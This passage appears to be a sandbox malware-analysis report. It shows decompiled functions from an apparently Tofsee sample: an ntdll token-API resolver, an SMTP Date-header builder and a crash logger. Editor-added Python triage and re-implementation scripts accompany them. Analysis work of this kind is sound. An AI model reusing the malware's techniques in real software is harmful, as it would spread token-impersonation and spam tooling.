                                                                                					}
                                                                                				} else {
                                                                                					_t2 = LoadLibraryA("ntdll.dll");
                                                                                					 *0x133918 = _t2;
                                                                                					if(_t2 != 0) {
                                                                                						goto L3;
                                                                                					} else {
                                                                                 						return _t2; // 0: LoadLibraryA("ntdll.dll") failed
                                                                                					}
                                                                                				}
                                                                                			}
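Reference model of the resolver decompiled above, added to this report for readability. It is not code recovered from the sample and not Joe Sandbox output; it reproduces only what the decompiled function shows: ntdll.dll is loaded once and cached in one global slot, 15 exports are resolved with GetProcAddress in a fixed order into 15 further slots, and the return value is 1 on success, 0 if ntdll.dll cannot be loaded, or -n when the n-th export in that order is missing. The fake export addresses, the HMODULE value and the sample memory dump below are constructed for the demonstration; `find_resolver_strings` is a triage helper for locating the same string table in other dumps.

```python
"""Model of E00121000 (ntdll import resolver) from the svchost dump at 0x120000.

Added example for this report; assumptions (constructed values) are marked.
"""
from typing import Dict

# Export names in the order the sample resolves them (taken from the decompiled code).
RESOLVE_ORDER = (
    "RtlExpandEnvironmentStrings_U",
    "RtlSetLastWin32Error",
    "NtTerminateProcess",
    "RtlFreeSid",
    "RtlInitUnicodeString",
    "NtSetInformationThread",
    "NtSetInformationToken",
    "RtlNtStatusToDosError",
    "NtClose",
    "NtOpenProcessToken",
    "NtDuplicateToken",
    "RtlAllocateAndInitializeSid",
    "NtFilterToken",
    "RtlLengthSid",
    "NtQueryInformationToken",
)


class ResolverModel:
    """Emulates the global table at 0x133918 (HMODULE) and 0x13391c..0x133954 (15 pointers)."""

    def __init__(self, exports: Dict[str, int], ntdll_loadable: bool = True):
        # `exports` stands in for GetProcAddress: name -> address. Addresses are
        # arbitrary non-zero ints chosen for the demonstration (assumption).
        self._exports = exports
        self._ntdll_loadable = ntdll_loadable
        self.hmodule: int = 0                                       # *0x133918
        self.slots: Dict[str, int] = {n: 0 for n in RESOLVE_ORDER}  # *0x13391c..*0x133954

    def resolve(self) -> int:
        """Mirror of E00121000(): returns 1 (ok), 0 (no ntdll) or -n (n-th export missing)."""
        if self.hmodule == 0:
            if not self._ntdll_loadable:
                return 0                        # LoadLibraryA returned NULL -> "return _t2"
            self.hmodule = 0x77000000           # constructed HMODULE value (assumption)
        if all(self.slots.values()):
            return 1                            # every slot already populated
        # Any empty slot makes the sample re-resolve the whole table from the first name.
        for idx, name in enumerate(RESOLVE_ORDER, start=1):
            addr = self._exports.get(name, 0)
            self.slots[name] = addr
            if addr == 0:
                return -idx                     # _t35 holds -idx at this point in the binary
        return 1                                # binary computes this as _t35 + 0x10 with _t35 == -15


def explain_status(code: int) -> str:
    """Translate the resolver's return value back into what went wrong."""
    if code == 1:
        return "all 15 ntdll exports resolved"
    if code == 0:
        return 'LoadLibraryA("ntdll.dll") failed'
    if -len(RESOLVE_ORDER) <= code <= -1:
        return f"GetProcAddress failed for {RESOLVE_ORDER[-code - 1]}"
    raise ValueError(f"not a return value of E00121000: {code}")


def find_resolver_strings(dump: bytes) -> Dict[str, int]:
    """Locate the NUL-terminated ASCII export names of this resolver in a memory dump.

    Returns name -> offset for the names found; a full, in-order hit set is a
    strong indicator that the same resolver is present in another dump.
    """
    found: Dict[str, int] = {}
    for name in RESOLVE_ORDER:
        off = dump.find(name.encode("ascii") + b"\x00")
        if off != -1:
            found[name] = off
    return found


# Constructed stand-in for a memory dump: padding, the "ntdll.dll" literal,
# then the 15 export names back to back as the sample's string table would appear.
CONSTRUCTED_DUMP = (
    b"\x00" * 16
    + b"ntdll.dll\x00"
    + b"".join(n.encode("ascii") + b"\x00" for n in RESOLVE_ORDER)
    + b"\x90" * 8
)

# Constructed export table: every name present, with arbitrary non-zero addresses.
FULL_EXPORTS = {n: 0x77010000 + 0x10 * i for i, n in enumerate(RESOLVE_ORDER, start=1)}


if __name__ == "__main__":
    model = ResolverModel(FULL_EXPORTS)
    print(model.resolve(), explain_status(model.resolve()))
    broken = ResolverModel({k: v for k, v in FULL_EXPORTS.items() if k != "NtFilterToken"})
    print(broken.resolve(), explain_status(broken.resolve()))
    for name, off in find_resolver_strings(CONSTRUCTED_DUMP).items():
        print(f"{off:#06x} {name}")
```

The model keeps the sample's quirk that a single emptied slot causes all 15 names to be resolved again from the start, which is what the `if(*0x13391c == 0 || ... )` chain implements.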

                                                                                0x00121000
                                                                                0x00121006
                                                                                0x0012100b
                                                                                0x00121023
                                                                                0x0012102a
                                                                                0x001210c2
                                                                                0x001210c4
                                                                                0x001210cb
                                                                                0x0012127b
                                                                                0x0012127b
                                                                                0x001210d1
                                                                                0x001210d1
                                                                                0x001210dc
                                                                                0x001210e1
                                                                                0x001210e3
                                                                                0x001210ea
                                                                                0x00000000
                                                                                0x001210f0
                                                                                0x001210f0
                                                                                0x001210fc
                                                                                0x00121101
                                                                                0x00121103
                                                                                0x0012110a
                                                                                0x00000000
                                                                                0x00121110
                                                                                0x00121110
                                                                                0x0012111c
                                                                                0x00121121
                                                                                0x00121123
                                                                                0x0012112a
                                                                                0x00000000
                                                                                0x00121130
                                                                                0x00121130
                                                                                0x0012113b
                                                                                0x00121140
                                                                                0x00121142
                                                                                0x00121149
                                                                                0x00000000
                                                                                0x0012114f
                                                                                0x0012114f
                                                                                0x0012115b
                                                                                0x00121160
                                                                                0x00121162
                                                                                0x00121169
                                                                                0x00000000
                                                                                0x0012116f
                                                                                0x0012116f
                                                                                0x0012117b
                                                                                0x00121180
                                                                                0x00121182
                                                                                0x00121189
                                                                                0x00000000
                                                                                0x0012118f
                                                                                0x0012118f
                                                                                0x0012119a
                                                                                0x0012119f
                                                                                0x001211a1
                                                                                0x001211a8
                                                                                0x00000000
                                                                                0x001211ae
                                                                                0x001211ae
                                                                                0x001211ba
                                                                                0x001211bf
                                                                                0x001211c1
                                                                                0x001211c8
                                                                                0x00000000
                                                                                0x001211ce
                                                                                0x001211ce
                                                                                0x001211da
                                                                                0x001211df
                                                                                0x001211e1
                                                                                0x001211e8
                                                                                0x00000000
                                                                                0x001211ee
                                                                                0x001211ee
                                                                                0x001211f9
                                                                                0x001211fe
                                                                                0x00121200
                                                                                0x00121207
                                                                                0x00000000
                                                                                0x00121209
                                                                                0x00121209
                                                                                0x00121215
                                                                                0x0012121a
                                                                                0x0012121c
                                                                                0x00121223
                                                                                0x00000000
                                                                                0x00121225
                                                                                0x00121225
                                                                                0x00121231
                                                                                0x00121236
                                                                                0x00121238
                                                                                0x0012123f
                                                                                0x00000000
                                                                                0x00121241
                                                                                0x00121241
                                                                                0x0012124c
                                                                                0x00121251
                                                                                0x00121253
                                                                                0x0012125a
                                                                                0x00000000
                                                                                0x0012125c
                                                                                0x0012125c
                                                                                0x00121268

                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(ntdll.dll,00000000,00121839,00129646), ref: 00121012
                                                                                • GetProcAddress.KERNEL32(00000000,RtlExpandEnvironmentStrings_U), ref: 001210C2
                                                                                • GetProcAddress.KERNEL32(00000000,RtlSetLastWin32Error), ref: 001210E1
                                                                                • GetProcAddress.KERNEL32(00000000,NtTerminateProcess), ref: 00121101
                                                                                • GetProcAddress.KERNEL32(00000000,RtlFreeSid), ref: 00121121
                                                                                • GetProcAddress.KERNEL32(00000000,RtlInitUnicodeString), ref: 00121140
                                                                                • GetProcAddress.KERNEL32(00000000,NtSetInformationThread), ref: 00121160
                                                                                • GetProcAddress.KERNEL32(00000000,NtSetInformationToken), ref: 00121180
                                                                                • GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 0012119F
                                                                                • GetProcAddress.KERNEL32(00000000,NtClose), ref: 001211BF
                                                                                • GetProcAddress.KERNEL32(00000000,NtOpenProcessToken), ref: 001211DF
                                                                                • GetProcAddress.KERNEL32(00000000,NtDuplicateToken), ref: 001211FE
                                                                                • GetProcAddress.KERNEL32(00000000,RtlAllocateAndInitializeSid), ref: 0012121A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressProc$LibraryLoad
                                                                                • String ID: NtClose$NtDuplicateToken$NtFilterToken$NtOpenProcessToken$NtQueryInformationToken$NtSetInformationThread$NtSetInformationToken$NtTerminateProcess$RtlAllocateAndInitializeSid$RtlExpandEnvironmentStrings_U$RtlFreeSid$RtlInitUnicodeString$RtlLengthSid$RtlNtStatusToDosError$RtlSetLastWin32Error$ntdll.dll
                                                                                • API String ID: 2238633743-3228201535
                                                                                • Opcode ID: f5a8ff9b856aa010d6783076c393b5fb6a9bd67ff522e39b46b0cdf98afdfe15
                                                                                • Instruction ID: fb4a2f74bd3b0ad01997a67f1f505948af8cee3f99055328b876caa15c1230a1
                                                                                • Opcode Fuzzy Hash: f5a8ff9b856aa010d6783076c393b5fb6a9bd67ff522e39b46b0cdf98afdfe15
                                                                                • Instruction Fuzzy Hash: E0515F71642A12FAD725CB6CBC4079636E87758329F24035AE530D2AF0E7F4CAC2CB59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%
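The function above never imports the routines it uses: it loads ntdll.dll with LoadLibraryA and resolves NtOpenProcessToken, NtDuplicateToken, NtFilterToken, NtSetInformationThread and the rest by name through GetProcAddress, so none of them appear in the PE import table and they only surface as plaintext strings once the sample has unpacked itself in memory (which is why the String ID line is what reveals the token-handling capability). The script below is an added example by the editor, not code from the report or from the sample: it pulls native-API names out of a dump and maps their combination to what the function is equipped to do. The dump bytes are constructed inline from the String ID line above, and the capability map is the editor's own reading, not a capa or ATT&CK mapping.

```python
"""Triage of run-time-resolved ntdll exports.

Added example by the editor, not code from the Joe Sandbox report or the
Tofsee sample.  The names a function resolves with GetProcAddress live only
as strings in the unpacked image; this recovers them from a dump and maps the
combination to the capability it implies.
"""
from __future__ import annotations

import re

# Constructed stand-in for a slice of the memory dump's string area: the names
# from the report's String ID line, NUL-terminated and back to back, plus some
# bytes that must not match.  For real use read the .sdmp file instead.
SAMPLE_DUMP = b"\x00".join([
    b"ntdll.dll", b"RtlExpandEnvironmentStrings_U", b"RtlSetLastWin32Error",
    b"NtTerminateProcess", b"RtlFreeSid", b"RtlInitUnicodeString",
    b"NtSetInformationThread", b"NtSetInformationToken", b"RtlNtStatusToDosError",
    b"NtClose", b"NtOpenProcessToken", b"NtDuplicateToken", b"NtFilterToken",
    b"NtQueryInformationToken", b"RtlAllocateAndInitializeSid", b"RtlLengthSid",
    b"\x90\x90\xe8\x00\x00\x00\x00", b"Jan 13 2018",
]) + b"\x00"

# Native-API naming convention: Nt/Zw/Rtl/Ldr prefix followed by a CamelCase name.
NATIVE_API = re.compile(rb"(?:Nt|Zw|Rtl|Ldr)[A-Z][A-Za-z0-9_]{2,}")

# Hypothetical capability map: the editor's reading of what these exports are
# used for together (not a capa or ATT&CK mapping).  A capability only fires
# when every listed export is present, so a lone NtClose produces nothing.
CAPABILITIES: dict[str, frozenset[str]] = {
    "impersonate-token": frozenset({"NtOpenProcessToken", "NtDuplicateToken",
                                    "NtSetInformationThread"}),
    "restricted-token":  frozenset({"NtOpenProcessToken", "NtFilterToken"}),
    "modify-token":      frozenset({"NtOpenProcessToken", "NtSetInformationToken"}),
    "build-sid":         frozenset({"RtlAllocateAndInitializeSid", "RtlFreeSid",
                                    "RtlLengthSid"}),
    "terminate-process": frozenset({"NtTerminateProcess"}),
}


def extract_native_api_names(blob: bytes) -> list[str]:
    """Distinct ntdll-style export names found in blob, in order of appearance."""
    seen: set[str] = set()
    names: list[str] = []
    for match in NATIVE_API.finditer(blob):
        name = match.group().decode("ascii")
        if name not in seen:
            seen.add(name)
            names.append(name)
    return names


def classify(names: list[str]) -> dict[str, list[str]]:
    """Map the resolved names to every capability whose full export set is present."""
    present = set(names)
    return {cap: sorted(need) for cap, need in CAPABILITIES.items() if need <= present}


def triage(blob: bytes) -> tuple[list[str], dict[str, list[str]]]:
    """Names recovered from the dump and the capabilities they add up to."""
    names = extract_native_api_names(blob)
    return names, classify(names)


if __name__ == "__main__":
    found, caps = triage(SAMPLE_DUMP)
    print(f"{len(found)} native API names resolved by name:")
    for n in found:
        print("  ", n)
    for cap, exports in caps.items():
        print(f"[{cap}] <- {', '.join(exports)}")
```

Run it against the raw .sdmp file named in the Memory Dump Source line to get the same list the report derived; static import-table tools see nothing here because the names are never in the import directory.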

                                                                                C-Code - Quality: 91%
                                                                                			E0012B211(FILETIME* _a4, CHAR* _a8, signed int _a12) {
                                                                                				struct _FILETIME _v12;
                                                                                				struct _SYSTEMTIME _v28;
                                                                                				CHAR* _v32;
                                                                                				CHAR* _v36;
                                                                                				CHAR* _v40;
                                                                                				CHAR* _v44;
                                                                                				CHAR* _v48;
                                                                                				CHAR* _v52;
                                                                                				CHAR* _v56;
                                                                                				CHAR* _v60;
                                                                                				CHAR* _v64;
                                                                                				CHAR* _v68;
                                                                                				CHAR* _v72;
                                                                                				CHAR* _v76;
                                                                                				CHAR* _v80;
                                                                                				CHAR* _v84;
                                                                                				CHAR* _v88;
                                                                                				CHAR* _v92;
                                                                                				CHAR* _v96;
                                                                                				CHAR* _v100;
                                                                                				CHAR* _v104;
                                                                                				struct _TIME_ZONE_INFORMATION _v276;
                                                                                				long _t77;
                                                                                				signed int _t80;
                                                                                				signed int _t93;
                                                                                				signed int _t101;
                                                                                				signed int _t102;
                                                                                				CHAR* _t103;
                                                                                				signed int _t104;
                                                                                				signed short _t106;
                                                                                				signed short _t109;
                                                                                				signed int _t114;
                                                                                				signed int _t115;
                                                                                				void* _t117;
                                                                                
                                                                                				_v56 = "Sun";
                                                                                				_v52 = "Mon";
                                                                                				_v48 = "Tue";
                                                                                				_v44 = "Wed";
                                                                                				_v40 = "Thu";
                                                                                				_v36 = "Fri";
                                                                                				_v32 = "Sat";
                                                                                				_v104 = "Jan";
                                                                                				_v100 = "Feb";
                                                                                				_v96 = "Mar";
                                                                                				_v92 = "Apr";
                                                                                				_v88 = "May";
                                                                                				_v84 = "Jun";
                                                                                				_v80 = "Jul";
                                                                                				_v76 = "Aug";
                                                                                				_v72 = "Sep";
                                                                                				_v68 = "Oct";
                                                                                				_v64 = "Nov";
                                                                                				_v60 = "Dec";
                                                                                				if(_a4 != 0) {
                                                                                					FileTimeToLocalFileTime(_a4,  &_v12);
                                                                                					FileTimeToSystemTime( &_v12,  &_v28);
                                                                                				} else {
                                                                                					GetLocalTime( &_v28);
                                                                                				}
                                                                                				_t114 = _a12;
                                                                                				if(_t114 != 0) {
                                                                                					SystemTimeToFileTime( &_v28,  &_v12);
                                                                                					_t93 = E0012ECA5();
                                                                                					if(_t114 <= 0) {
                                                                                						_t104 = _t93 %  ~_t114 * 0x23c34600;
                                                                                						_v12.dwLowDateTime = _v12.dwLowDateTime - _t104;
                                                                                						asm("sbb [ebp-0x4], ebx");
                                                                                					} else {
                                                                                						_t104 = _t93 % _t114 * 0x23c34600;
                                                                                						_v12.dwLowDateTime = _v12.dwLowDateTime + _t104;
                                                                                						asm("adc [ebp-0x4], ebx");
                                                                                					}
                                                                                					FileTimeToSystemTime( &_v12,  &_v28);
                                                                                				}
                                                                                				_v276.Bias = 0;
                                                                                				_t77 = GetTimeZoneInformation( &_v276);
                                                                                				_t101 = _v276.Bias;
                                                                                				if(_t77 == 2) {
                                                                                					_t101 = _t101 + _v276.DaylightBias;
                                                                                				}
                                                                                				_t102 =  ~_t101;
                                                                                				asm("cdq");
                                                                                				_t80 = (_t102 ^ _t104) - _t104;
                                                                                				if(_v28.wDayOfWeek > 6) {
                                                                                					_t109 = 6;
                                                                                					_v28.wDayOfWeek = _t109;
                                                                                				}
                                                                                				if(_v28.wMonth == 0) {
                                                                                					_v28.wMonth = 1;
                                                                                				}
                                                                                				if(_v28.wMonth > 0xc) {
                                                                                					_t106 = 0xc;
                                                                                					_v28.wMonth = _t106;
                                                                                				}
                                                                                				_t103 = "+";
                                                                                				if(_t102 < 0) {
                                                                                					_t103 = "-";
                                                                                				}
                                                                                				_t115 = 0x3c;
                                                                                				asm("cdq");
                                                                                				return wsprintfA(_a8, "%s, %u %s %u %.2u:%.2u:%.2u %s%.2u%.2u",  *((intOrPtr*)(_t117 + (_v28.wDayOfWeek & 0x0000ffff) * 4 - 0x34)), _v28.wDay & 0x0000ffff,  *((intOrPtr*)(_t117 + (_v28.wMonth & 0x0000ffff) * 4 - 0x68)), _v28.wYear & 0x0000ffff, _v28.wHour & 0x0000ffff, _v28.wMinute & 0x0000ffff, _v28.wSecond & 0x0000ffff, _t103, _t80 / _t115, _t80 % _t115);
                                                                                			}

(Address column for the listing above, one address per decompiled line, spanning 0x0012b225 to 0x0012b3c4.)

                                                                                APIs
                                                                                • GetLocalTime.KERNEL32(?), ref: 0012B2B3
                                                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0012B2C2
                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 0012B2D0
                                                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 0012B2E1
                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 0012B31A
                                                                                • GetTimeZoneInformation.KERNEL32(?), ref: 0012B329
                                                                                • wsprintfA.USER32 ref: 0012B3B7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Time$File$System$Local$InformationZonewsprintf
                                                                                • String ID: %s, %u %s %u %.2u:%.2u:%.2u %s%.2u%.2u$Apr$Aug$Dec$Feb$Fri$Jan$Jul$Jun$Mar$May$Mon$Nov$Oct$Sat$Sep$Sun$Thu$Tue$Wed
                                                                                • API String ID: 766114626-2976066047
                                                                                • Opcode ID: f19a63bb8b83fe1697266c2f7eac72d38bab808138c82a3de0336109d1f2430b
                                                                                • Instruction ID: 3cd415f4058681b7ae059af1e853370b33ac665ce6571c9f49053b278d257e12
                                                                                • Opcode Fuzzy Hash: f19a63bb8b83fe1697266c2f7eac72d38bab808138c82a3de0336109d1f2430b
                                                                                • Instruction Fuzzy Hash: C65128B1D0022CABCF16DFD5D9988EEBBF9BF4C314F1051A9E601B6150D3B49A99CB90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%
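E0012B211 builds a date string in the form an SMTP Date header takes ("%s, %u %s %u %.2u:%.2u:%.2u %s%.2u%.2u"): the local time, optionally shifted by a random number of minutes (0x23C34600 is 600,000,000 100-ns FILETIME ticks, exactly 60 s, and the third argument bounds the shift and sets its direction), followed by the host's UTC offset taken from GetTimeZoneInformation (Bias, plus DaylightBias when the call returns TIME_ZONE_ID_DAYLIGHT, then negated, because Windows stores UTC minus local). The day-of-week and month clamps only keep the two string-table indices in range. Below is an added re-implementation by the editor, not code from the report or from the sample, for regenerating and parsing the string; it assumes E0012ECA5 is a 32-bit PRNG and stands random.Random in for it.

```python
"""Re-implementation of the Date-string builder above (E0012B211).

Added example by the editor, not code from the report or the sample.  It
reproduces the string the function emits so it can be regenerated and parsed.
The PRNG the function calls (E0012ECA5) is assumed to return a 32-bit value
and is replaced here by random.Random.
"""
from __future__ import annotations

import datetime as dt
import random
from dataclasses import dataclass

# The two string tables the function keeps on its stack (_v56.._v32, _v104.._v60).
DAYS = ["Sun", "Mon", "Tue", "Wed", "Thu", "Fri", "Sat"]
MONTHS = ["Jan", "Feb", "Mar", "Apr", "May", "Jun",
          "Jul", "Aug", "Sep", "Oct", "Nov", "Dec"]

# 0x23C34600 = 600,000,000 FILETIME ticks of 100 ns = exactly 60 s: the shift is in minutes.
FILETIME_MINUTE = 0x23C34600
assert FILETIME_MINUTE == 60 * 10_000_000


@dataclass
class SystemTime:
    """Mirror of Win32 SYSTEMTIME (the fields the function reads)."""
    year: int
    month: int
    day_of_week: int   # 0 = Sunday, as in SYSTEMTIME
    day: int
    hour: int
    minute: int
    second: int

    @classmethod
    def from_datetime(cls, d: dt.datetime) -> "SystemTime":
        return cls(d.year, d.month, (d.weekday() + 1) % 7, d.day, d.hour, d.minute, d.second)

    def to_datetime(self) -> dt.datetime:
        return dt.datetime(self.year, self.month, self.day, self.hour, self.minute, self.second)


def format_date_header(local: SystemTime, bias_min: int, daylight_bias_min: int,
                       in_daylight: bool, jitter_min: int, rng: random.Random) -> str:
    """Build the string as wsprintfA("%s, %u %s %u %.2u:%.2u:%.2u %s%.2u%.2u") does.

    local      -- local SYSTEMTIME (GetLocalTime, or the FILETIME argument converted)
    bias_min   -- TIME_ZONE_INFORMATION.Bias, i.e. UTC minus local, in minutes
    jitter_min -- the third argument (_a12): bounds the random shift in minutes
    """
    st = local
    if jitter_min != 0:
        # The decompilation takes the modulus with _a12 when positive and with
        # ~_a12 (bitwise NOT, i.e. |_a12| - 1) when negative; reproduced as-is,
        # so a value of -1 divides by zero exactly as the listing would.
        modulus = jitter_min if jitter_min > 0 else ~jitter_min
        n = rng.getrandbits(32) % modulus          # E0012ECA5 assumed to be a 32-bit PRNG
        shifted = st.to_datetime() + dt.timedelta(minutes=n if jitter_min > 0 else -n)
        st = SystemTime.from_datetime(shifted)

    # GetTimeZoneInformation returning TIME_ZONE_ID_DAYLIGHT (2) adds DaylightBias.
    bias = bias_min + (daylight_bias_min if in_daylight else 0)
    offset = -bias          # Windows bias is UTC - local; the header wants local - UTC
    sign = "-" if offset < 0 else "+"
    hh, mm = divmod(abs(offset), 60)

    # The three clamps in the function keep the table indices in range.
    dow = min(st.day_of_week, 6)
    month = max(1, min(st.month, 12))
    return (f"{DAYS[dow]}, {st.day} {MONTHS[month - 1]} {st.year} "
            f"{st.hour:02d}:{st.minute:02d}:{st.second:02d} {sign}{hh:02d}{mm:02d}")


def parse_date_header(text: str) -> dt.datetime:
    """Parse the string back; it is a valid RFC 5322 date-time, so strptime handles it."""
    return dt.datetime.strptime(text, "%a, %d %b %Y %H:%M:%S %z")


if __name__ == "__main__":
    # Constructed input: the sample's own build timestamp (Jan 13 2018 12:08:32), a Saturday.
    base = SystemTime(2018, 1, 6, 13, 12, 8, 32)
    print(format_date_header(base, -60, -60, False, 0, random.Random()))
    for seed in range(3):
        print(format_date_header(base, -60, -60, False, 10, random.Random(seed)))
```

With a positive third argument the date moves forward by 0 to N-1 minutes; with a negative one the listing divides by ~N, which is |N|-1, so the backward shift is 0 to |N|-2 minutes. The re-implementation keeps that quirk rather than assuming the decompiler rendered a NEG as a NOT.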

                                                                                C-Code - Quality: 57%
                                                                                			E00126511(void* __ecx) {
                                                                                				signed int _t75;
                                                                                				signed int _t76;
                                                                                				int _t78;
                                                                                				void* _t83;
                                                                                				signed int _t93;
                                                                                				void* _t95;
                                                                                				signed int _t99;
                                                                                				int _t101;
                                                                                				int _t115;
                                                                                				int _t117;
                                                                                				void* _t118;
                                                                                				void* _t119;
                                                                                				void* _t120;
                                                                                				void* _t122;
                                                                                				intOrPtr _t135;
                                                                                				intOrPtr* _t137;
                                                                                				void* _t139;
                                                                                				void* _t141;
                                                                                				void* _t143;
                                                                                				void* _t144;
                                                                                				void* _t152;
                                                                                
                                                                                				_t122 = __ecx;
                                                                                				_t139 = _t141 - 0x74;
                                                                                				_t75 =  *(_t139 + 0x7c);
                                                                                				_t135 =  *((intOrPtr*)(_t75 + 4));
                                                                                				_t76 =  *_t75;
                                                                                				 *(_t139 + 0x7c) = _t76;
                                                                                				_t78 = wsprintfA(_t139 - 0x898, "\nver=%d date=%s %s\nc=%08x a=%p", 0x61, "Jan 13 2018", "12:08:32",  *_t76,  *((intOrPtr*)(_t76 + 0xc)));
                                                                                				_t143 = _t141 - 0x90c + 0x1c;
                                                                                				_t117 = _t78;
                                                                                				if(IsBadReadPtr( *( *(_t139 + 0x7c) + 0xc), 8) != 0) {
                                                                                					E0012E318();
                                                                                					ExitProcess(0);
                                                                                				}
                                                                                				_t83 =  *( *(_t139 + 0x7c) + 0xc);
                                                                                				__imp__#8( *((intOrPtr*)(_t83 + 4)), E00126511);
                                                                                				__imp__#8();
                                                                                				_t118 = _t117 + wsprintfA(_t139 + _t117 - 0x898, " va=%08X%08X uef=%p",  *( *(_t139 + 0x7c) + 0xc),  *( *( *(_t139 + 0x7c) + 0xc)), _t83);
                                                                                				_t119 = _t118 + wsprintfA(_t139 + _t118 - 0x898, "\n_ax=%p\t_bx=%p\t_cx=%p\t_dx=%p\t_si=%p\t_di=%p\t_bp=%p\t_sp=%p\n",  *((intOrPtr*)(_t135 + 0xb0)),  *((intOrPtr*)(_t135 + 0xa4)),  *((intOrPtr*)(_t135 + 0xac)),  *((intOrPtr*)(_t135 + 0xa8)),  *((intOrPtr*)(_t135 + 0xa0)),  *((intOrPtr*)(_t135 + 0x9c)),  *((intOrPtr*)(_t135 + 0xb4)),  *((intOrPtr*)(_t135 + 0xc4)));
                                                                                				E0012EE2A(_t122, _t139 - 0x98, 0, 0x108);
                                                                                				_t144 = _t143 + 0x48;
                                                                                				 *((intOrPtr*)(_t139 - 0x98)) =  *((intOrPtr*)(_t135 + 0xb8));
                                                                                				_t93 = 3;
                                                                                				_push(0);
                                                                                				_push(0);
                                                                                				 *(_t139 - 0x8c) = _t93;
                                                                                				 *((intOrPtr*)(_t139 - 0x94)) = 0;
                                                                                				_push(0);
                                                                                				 *(_t139 - 0x5c) = _t93;
                                                                                				_push(0);
                                                                                				 *((intOrPtr*)(_t139 - 0x68)) =  *((intOrPtr*)(_t135 + 0xc4));
                                                                                				 *((intOrPtr*)(_t139 - 0x64)) = 0;
                                                                                				_t130 =  *((intOrPtr*)(_t135 + 0xb4));
                                                                                				 *(_t139 - 0x6c) = _t93;
                                                                                				 *(_t139 + 0x7c) = _t93;
                                                                                				_push(_t135);
                                                                                				_push(_t139 - 0x98);
                                                                                				 *((intOrPtr*)(_t139 - 0x78)) =  *((intOrPtr*)(_t135 + 0xb4));
                                                                                				 *((intOrPtr*)(_t139 - 0x74)) = 0;
                                                                                				_push(0);
                                                                                				while(1) {
                                                                                					_t95 = GetCurrentProcess();
                                                                                					__imp__StackWalk64(0x14c, _t95);
                                                                                					if(_t95 == 0) {
                                                                                						break;
                                                                                					}
                                                                                					_t95 = 0;
                                                                                					if( *(_t139 + 0x7c) != 0) {
                                                                                						if( *((intOrPtr*)(_t139 - 0x88)) != 0) {
                                                                                							_t115 = wsprintfA(_t139 + _t119 - 0x898, "ret=%p\tp1=%p\tp2=%p\tp3=%p\tp4=%p\n",  *((intOrPtr*)(_t139 - 0x88)),  *((intOrPtr*)(_t139 - 0x40)),  *((intOrPtr*)(_t139 - 0x38)),  *((intOrPtr*)(_t139 - 0x30)),  *((intOrPtr*)(_t139 - 0x28)));
                                                                                							_t144 = _t144 + 0x1c;
                                                                                							_t119 = _t119 + _t115;
                                                                                							_t95 = 0;
                                                                                						}
                                                                                						 *(_t139 + 0x7c) =  *(_t139 + 0x7c) - 1;
                                                                                						_push(_t95);
                                                                                						_push(_t95);
                                                                                						_push(_t95);
                                                                                						_push(_t95);
                                                                                						_push(_t135);
                                                                                						_push(_t139 - 0x98);
                                                                                						_push(_t95);
                                                                                						continue;
                                                                                					}
                                                                                					break;
                                                                                				}
                                                                                				 *(_t139 + 0x7c) = _t95;
                                                                                				_t120 = _t119 + wsprintfA(_t139 + _t119 - 0x898, "plgs:");
                                                                                				 *(_t139 + 0x70) =  *(_t139 + 0x70) & 0x00000000;
                                                                                				do {
                                                                                					_t137 = 0x132c40 +  *(_t139 + 0x70) * 4;
                                                                                					if( *_t137 != 0) {
                                                                                						_t99 =  *(_t139 + 0x7c) & 0x80000007;
                                                                                						if(_t99 < 0) {
                                                                                							_t152 = (_t99 - 0x00000001 | 0xfffffff8) + 1;
                                                                                						}
                                                                                						if(_t152 == 0) {
                                                                                							_t120 = _t120 + wsprintfA(_t139 + _t120 - 0x898, "\n");
                                                                                						}
                                                                                						_t101 = wsprintfA(_t139 + _t120 - 0x898, "\t%d=%p",  *(_t139 + 0x70),  *_t137);
                                                                                						_t144 = _t144 + 0x10;
                                                                                						_t120 = _t120 + _t101;
                                                                                						 *(_t139 + 0x7c) =  *(_t139 + 0x7c) + 1;
                                                                                					}
                                                                                					 *(_t139 + 0x70) =  *(_t139 + 0x70) + 1;
                                                                                				} while ( *(_t139 + 0x70) < 0x20);
                                                                                				wsprintfA(_t139 + _t120 - 0x898, "\n");
                                                                                				E0012E8A1(_t130, 1, "localcfg", "except_info", _t139 - 0x898);
                                                                                				E0012E318();
                                                                                				return 1;
                                                                                			}

                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: wsprintf$Processhtonl$CurrentExitReadStackWalk64
                                                                                • String ID: %d=%p$_ax=%p_bx=%p_cx=%p_dx=%p_si=%p_di=%p_bp=%p_sp=%p$ver=%d date=%s %sc=%08x a=%p$ va=%08X%08X uef=%p$12:08:32$Jan 13 2018$except_info$localcfg$plgs:$ret=%pp1=%pp2=%pp3=%pp4=%p
                                                                                • API String ID: 2400214276-165278494
                                                                                • Opcode ID: d2b137954edf8a0f71e75d9c59e87f01d5188342ab5a8c464245c79ba4a898c4
                                                                                • Instruction ID: c161f2037cd168e7bfe8fb5152d313ea29cf119f0ef8d2e237734cf2f63c4fca
                                                                                • Opcode Fuzzy Hash: d2b137954edf8a0f71e75d9c59e87f01d5188342ab5a8c464245c79ba4a898c4
